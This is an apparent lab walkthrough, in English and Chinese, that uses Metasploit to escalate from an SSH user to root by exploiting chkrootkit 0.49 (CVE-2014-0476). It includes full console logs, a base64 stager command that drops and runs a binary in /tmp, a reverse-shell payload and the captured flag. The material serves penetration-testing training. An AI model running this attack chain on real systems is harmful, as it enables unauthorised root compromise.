Linux Privilege Escalation: Exploiting A Vulnerable Program
Linux Privilege Escalation
The privilege escalation techniques we can utilize will depend on the version of the Linux kernel running on the target system as well as the distribution release version.
MSF offers very little in regard to Linux kernel exploit modules. However, in some cases, there may be an exploit module that can be utilized to exploit a vulnerable service or program in order to elevate our privileges.
Linux 权限提升:利用易受攻击的程序
Linux 提权
我们可以使用的权限提升技术将取决于目标系统上运行的 Linux 内核版本以及分发版本。
MSF 提供的 Linux 内核漏洞利用模块很少。 但是,在某些情况下,可能会有一个漏洞利用模块可用于利用易受攻击的服务或程序来提升我们的权限。
Demo: Linux Privilege Escalation: Exploiting A Vulnerable Program(演示:Linux 权限提升:利用易受攻击的程序)
1
2
3
ifconfig
eth0: 10.1.1.5
eth1: 192.124.219.2
Target IP Address: 192.124.219.3
1
2
3
4
5
6
7
8
9
10
service postgresql start && msfconsole -q
workspace -a LinuxPrivEsc
setg RHOSTS 192.124.219.3
db_nmap -sV 192.124.219.3
search ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
set USERNAME jackie
set PASSWORD password
exploit
This will authenticate, and provide us with a command shell session on the target system.
1
2
sessions
sessions 1
That gives us access to the Linux system via a command shell.
1
pwd
Open up a bash session here.
1
/bin/bash -i
We are currently logged in as the user Jackie. We can perform some basic enumeration.
1
jackie@victim-1:~$ whoami
We are indeed Jackie.
1
jackie@victim-1:~$ cat /etc/*issue
That’s the distribution release version.
1
jackie@victim-1:~$ uname -r
We get the kernel version.
We want to establish a Meterpreter session or to upgrade our command shell session into a Meterpreter session.
Put this in the background.
1
2
jackie@victim-1:~$ ^Z
Background session 1 [y/N] y
Utilize the sessions command and upgrade session 1.
1
2
3
sessions -u 1
sessions
sessions 2
1
2
meterpreter > sysinfo
meterpreter > getuid
In this case, it says no-user, but it provides us with the user id. The user is jackie.
Open up a bash session here.
1
2
meterpreter > shell
/bin/bash -i
Enumerate the users on the system.
1
cat /etc/passwd
We only have two user accounts. One of them is jackie, and the other one is the root user account. The rest of them are all service accounts. And we want to elevate our privileges to that of the root user.
In order to identify the vulnerable program or service, we can list out the processes running on the system using the command ps aux.
1
2
3
jackie@victim-1:~$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 33 0.0 0.0 9916 2700 ? S 00:17 0:00 /bin/bash /bin/check-down
If we take a look at the process tree, the user root here has initiated a program binary or script and has executed it with bash, and the name of the binary or script is called check-down, and it’s stored within the binaries directory.
We can check out what this file does by catting the contents of the file. And it could be a binary or it could be a script.
1
2
3
4
5
6
7
jackie@victim-1:~$ cat /bin/check-down
#!/bin/bash
while :
do
/usr/local/bin/chkrootkit/chkrootkit -x > /dev/null 2>&1
sleep 60
done
In this case, it looks like it is a Bash script.
The binary chkrootkit is executed every 60 seconds or every minute. This particular check-down script is used to run chkrootkit every 60 seconds.
What is chkrootkit? chkrootkit is a Linux utility that is used to scan a Linux system for rootkit. It’s an anti rootkit system.
chkrootkit in this particular case is vulnerable to a local privilege escalation vulnerability, but it only affects versions older that 0.5.0.
Check out the version of chkrootkit.
1
2
jackie@victim-1:~$ chkrootkit --help
Usage: /bin/chkrootkit [options] [test ...]
We can enumerate the version by using -V.
1
jackie@victim-1:~$ chkrootkit -V
The version of chkrootkit is 0.4.9, which means we can exploit this particular binary in order to elevate our privileges.
Put this in the background.
Terminate this channel.
1
jackie@victim-1:~$ ^C
Put the Meterpreter session in the background.
1
Background session 2? [y/N] y
Search for the chkrootkit exploit module here.
1
2
3
search chkrootkit
use exploit/unix/local/chkrootkit
show options
Chkrootkit Local Privilege Escalation
Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privilege escalation. WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default.
Chkrootkit 本地提权
0.50 之前的 Chkrootkit 将以 root 身份运行任何名为 /tmp/update 的可执行文件,从而允许进行微不足道的权限提升。WfsDelay 设置为 24h,因为这是默认安排 chkrootkit 扫描的频率。
We can also configure the payload option, which in this case, the payload that’s being used is a simple command shell payload for Unix.
1
info
When we perform the enumeration of chkrootkit, chkrootkit is stored under the binary directory /bin/chkrootkit.
In order to execute this.
1
set CHKROOTKIT /bin/chkrootkit
Because Linux will be able to specify that or to identify the value of the binary.
1
set SESSION 2
We want to run this via the Meterpreter session.
1
2
3
set LHOST 192.124.219.2
exploit
^C
It’ll create a Cron job to execute the /tmp/update file that has been created, it’s then going to wait for chkrootkit to run via cron.
1
2
3
show options
set LHOST 192.124.219.2
exploit
We may have to change the path to chkrootkit if this doesn’t work. We may have to specify the absolute path.
It’s going to be executed via the Cron job.
We get a command shell session open.
1
2
/bin/bash -i
root@victim-1:~#
We now have root access and have successfully been able to elevate our privileges.
1
2
root@victim-1:~# whoami
root
We are root, and we now have root privileges.
That is how to elevate your privileges on a Linux system via exploiting a vulnerable program or binary that’s on the Linux system. And this is also applicable to a kernel exploit. However, kernel exploits in the case of Metasploit Framework will need to be done manually and will involve the process of downloading exploit code remotely.
Privilege Escalation - Rootkit Scanner
Overview
The target server as described below is running vulnerable Rootkit Scanner. Your task is to exploit a known issue using the appropriate Metasploit module and escalate to root user.
Objective: Escalate to root user on the target machine and retrieve the flag!
SSH Login Credentials:
| Username | Password | | jackie | password |
Instructions:
- This lab is dedicated to you! No other users are on this network
- Once you start the lab, you will have access to a root terminal of a Kali instance
- Your Kali has an interface with IP address 192.X.Y.2. Run “ip addr” to know the values of X and Y.
- The target server should be located at the IP address 192.X.Y.3.
- Do not attack the gateway located at IP address 192.X.Y.1
- postgresql is not running by default so Metasploit may give you an error about this when starting
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1396.pdf
特权升级 - Rootkit 扫描程序
概述
如下所述的目标服务器正在运行易受攻击的 Rootkit 扫描程序。您的任务是使用适当的 Metasploit 模块利用已知问题并升级到 root 用户。
目标:升级到目标机器上的 root 用户并检索标志!
SSH 登录凭据:
| 用户名| 密码| | jackie | password |
指示:
- 这个实验室是献给你的!该网络上没有其他用户
- 开始实验后,您将可以访问 Kali 实例的根终端
- 你的 Kali 有一个 IP 地址为 192.XY2 的接口。运行“ip addr”以了解 X 和 Y 的值。
- 目标服务器应位于 IP 地址 192.XY3。
- 不要攻击位于 IP 地址 192.XY1 的网关
- 默认情况下 postgresql 没有运行,所以 Metasploit 可能会在启动时给你一个错误
解决方案
本实验室的解决方案可在以下手册中找到: https://assets.ine.com/labs/ad-manuals/walkthrough-1396.pdf
复现视频内容
1
2
3
4
5
6
7
8
root@attackdefense:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.1.0.5 netmask 255.255.0.0 broadcast 10.1.255.255
ether 02:42:0a:01:00:05 txqueuelen 0 (Ethernet)
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.127.83.2 netmask 255.255.255.0 broadcast 192.127.83.255
ether 02:42:c0:7f:53:02 txqueuelen 0 (Ethernet)
Target IP Address: 192.127.83.3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > workspace -a LinuxPrivEsc
[*] Added workspace: LinuxPrivEsc
[*] Workspace: LinuxPrivEsc
msf5 > setg RHOSTS 192.127.83.3
RHOSTS => 192.127.83.3
msf5 > db_nmap -sV 192.127.83.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-12 03:12 UTC
[*] Nmap: Nmap scan report for target-1 (192.127.83.3)
[*] Nmap: Host is up (0.000010s latency).
[*] Nmap: Not shown: 999 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
[*] Nmap: MAC Address: 02:42:C0:7F:53:03 (Unknown)
[*] Nmap: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.127.83.3 22 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
msf5 > search ssh_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
1 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS 192.127.83.3 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf5 auxiliary(scanner/ssh/ssh_login) > set USERNAME jackie
USERNAME => jackie
msf5 auxiliary(scanner/ssh/ssh_login) > set PASSWORD password
PASSWORD => password
msf5 auxiliary(scanner/ssh/ssh_login) > exploit
[+] 192.127.83.3:22 - Success: 'jackie:password' ''
[*] Command shell session 1 opened (192.127.83.2:40663 -> 192.127.83.3:22) at 2023-03-12 03:15:52 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
msf5 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell unknown SSH jackie:password (192.127.83.3:22) 192.127.83.2:40663 -> 192.127.83.3:22 (192.127.83.3)
msf5 auxiliary(scanner/ssh/ssh_login) > sessions 1
[*] Starting interaction with 1...
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 5.4.0-125-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
pwd
/home/jackie
/bin/bash -i
bash: cannot set terminal process group (2909): Inappropriate ioctl for device
bash: no job control in this shell
jackie@victim-1:~$
1
2
3
4
5
6
7
8
9
10
11
12
jackie@victim-1:~$ whoami
whoami
jackie
jackie@victim-1:~$ cat /etc/*issue
cat /etc/*issue
Ubuntu 18.04.3 LTS \n \l
jackie@victim-1:~$ uname -r
uname -r
5.4.0-125-generic
jackie@victim-1:~$ ^Z
Background session 1? [y/N] y
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
msf5 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell unknown SSH jackie:password (192.127.83.3:22) 192.127.83.2:40663 -> 192.127.83.3:22 (192.127.83.3)
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[!] SESSION may not be compatible with this module.
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.127.83.2:4433
[*] Sending stage (980808 bytes) to 192.127.83.3
[*] Meterpreter session 2 opened (192.127.83.2:4433 -> 192.127.83.3:53736) at 2023-03-12 03:23:09 +0000
[-] Error: Unable to execute the following command: "echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAA
ASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towH9TAmgCABFRieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82
AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/GhXch.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl
enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which per
l >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/YePRk' < '/tmp/GhXch.b64' ; chmod +x '/tmp/YePRk' ; '/tmp/YePRk' & sleep 2
; rm -f '/tmp/YePRk' ; rm -f '/tmp/GhXch.b64'"
[-] Output: "[1] 5804"
msf5 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell unknown SSH jackie:password (192.127.83.3:22) 192.127.83.2:40663 -> 192.127.83.3:22 (192.127.83.3)
2 meterpreter x86/linux no-user @ victim-1 (uid=1000, gid=1000, euid=1000, egid=1000) @ 192.127.83.3 192.127.83.2:4433 -> 192.127.83.3:53736 (192.127.83.3)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
msf5 auxiliary(scanner/ssh/ssh_login) > sessions 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : 192.127.83.3
OS : Ubuntu 18.04 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > getuid
Server username: no-user @ victim-1 (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > shell
Process 7443 created.
Channel 1 created.
/bin/bash -i
bash: cannot set terminal process group (2909): Inappropriate ioctl for device
bash: no job control in this shell
jackie@victim-1:~$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
messagebus:x:103:105::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
jackie:x:1000:1000:,,,:/home/jackie:/bin/bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
jackie@victim-1:~$ ps aux
ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 4624 852 ? Ss 03:08 0:00 /bin/sh -c /usr/local/bin/start.sh
root 7 0.0 0.0 55104 20420 ? S 03:08 0:00 /usr/bin/python /usr/bin/supervisord -n
root 12 0.0 0.0 28352 2604 ? Ss 03:08 0:00 /usr/sbin/cron
root 22 0.0 0.0 72292 3360 ? Ss 03:08 0:00 /usr/sbin/sshd
root 30 0.0 0.0 9916 2800 ? S 03:09 0:00 /bin/bash /bin/check-down
root 2897 0.0 0.0 101548 6996 ? Ss 03:15 0:00 sshd: jackie [priv]
jackie 2908 0.0 0.0 103848 5568 ? S 03:15 0:00 sshd: jackie@notty
jackie 2909 0.0 0.0 18372 3072 ? Ss 03:15 0:00 -bash
jackie 4145 0.0 0.0 18504 3528 ? S 03:18 0:00 /bin/bash -i
jackie 5804 0.0 0.0 1144 1024 ? S 03:23 0:00 /tmp/YePRk
jackie 7443 0.0 0.0 4624 828 ? S 03:26 0:00 /bin/sh
jackie 7444 0.0 0.0 18504 3436 ? S 03:26 0:00 /bin/bash -i
root 8269 0.0 0.0 4528 768 ? S 03:28 0:00 sleep 60
jackie 8270 0.0 0.0 34396 2936 ? R 03:28 0:00 ps aux
1
2
3
4
5
6
7
8
jackie@victim-1:~$ cat /bin/check-down
cat /bin/check-down
#!/bin/bash
while :
do
/usr/local/bin/chkrootkit/chkrootkit -x > /dev/null 2>&1
sleep 60
done
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
jackie@victim-1:~$ chkrootkit --help
chkrootkit --help
Usage: /bin/chkrootkit [options] [test ...]
Options:
-h show this help and exit
-V show version information and exit
-l show available tests and exit
-d debug
-q quiet mode
-x expert mode
-r dir use dir as the root directory
-p dir1:dir2:dirN path for the external commands used by chkrootkit
-n skip NFS mounted dirs
jackie@victim-1:~$ chkrootkit -V
chkrootkit -V
chkrootkit version 0.49
jackie@victim-1:~$ ^C
Terminate channel 1? [y/N] Y
meterpreter >
Background session 2? [y/N]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
msf5 auxiliary(scanner/ssh/ssh_login) > search chkrootkit
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/local/chkrootkit 2014-06-04 manual Yes Chkrootkit Local Privilege Escalation
msf5 auxiliary(scanner/ssh/ssh_login) > use exploit/unix/local/chkrootkit
msf5 exploit(unix/local/chkrootkit) > info
Name: Chkrootkit Local Privilege Escalation
Module: exploit/unix/local/chkrootkit
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 2014-06-04
Provided by:
Thomas Stangner
Julien "jvoisin" Voisin
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit
SESSION yes The session to run this module on.
Payload information:
Description:
Chkrootkit before 0.50 will run any executable file named
/tmp/update as root, allowing a trivial privilege escalation.
WfsDelay is set to 24h, since this is how often a chkrootkit scan is
scheduled by default.
References:
https://cvedetails.com/cve/CVE-2014-0476/
OSVDB (107710)
https://www.exploit-db.com/exploits/33899
http://www.securityfocus.com/bid/67813
https://cwe.mitre.org/data/definitions/20.html
https://seclists.org/oss-sec/2014/q2/430
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
msf5 exploit(unix/local/chkrootkit) > set CHKROOTKIT /bin/chkrootkit
CHKROOTKIT => /bin/chkrootkit
msf5 exploit(unix/local/chkrootkit) > set SESSION 2
SESSION => 2
msf5 exploit(unix/local/chkrootkit) > set LHOST 192.127.83.2
LHOST => 192.127.83.2
msf5 exploit(unix/local/chkrootkit) > exploit
[*] Started reverse TCP double handler on 10.1.0.5:4444
[!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
^C[*] Exploit completed, but no session was created.
msf5 exploit(unix/local/chkrootkit) > show options
Module options (exploit/unix/local/chkrootkit):
Name Current Setting Required Description
---- --------------- -------- -----------
CHKROOTKIT /bin/chkrootkit yes Path to chkrootkit
SESSION 2 yes The session to run this module on.
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.1.0.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(unix/local/chkrootkit) > set LHOST 192.127.83.2
LHOST => 192.127.83.2
msf5 exploit(unix/local/chkrootkit) > exploit
[*] Started reverse TCP double handler on 192.127.83.2:4444
[!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 0Kzfr8NXEhMfYSZc;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "0Kzfr8NXEhMfYSZc\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (192.127.83.2:4444 -> 192.127.83.3:47900) at 2023-03-12 03:49:26 +0000
[+] Deleted /tmp/update
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/bin/bash -i
bash: cannot set terminal process group (26): Inappropriate ioctl for device
bash: no job control in this shell
root@victim-1:~# whoami
whoami
root
root@victim-1:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@victim-1:~# pwd
pwd
/root
root@victim-1:~# ls
ls
flag
root@victim-1:~# cat flag
cat flag
9db8bf8f483ff50857f26f9bd636bed6
root@victim-1:~#
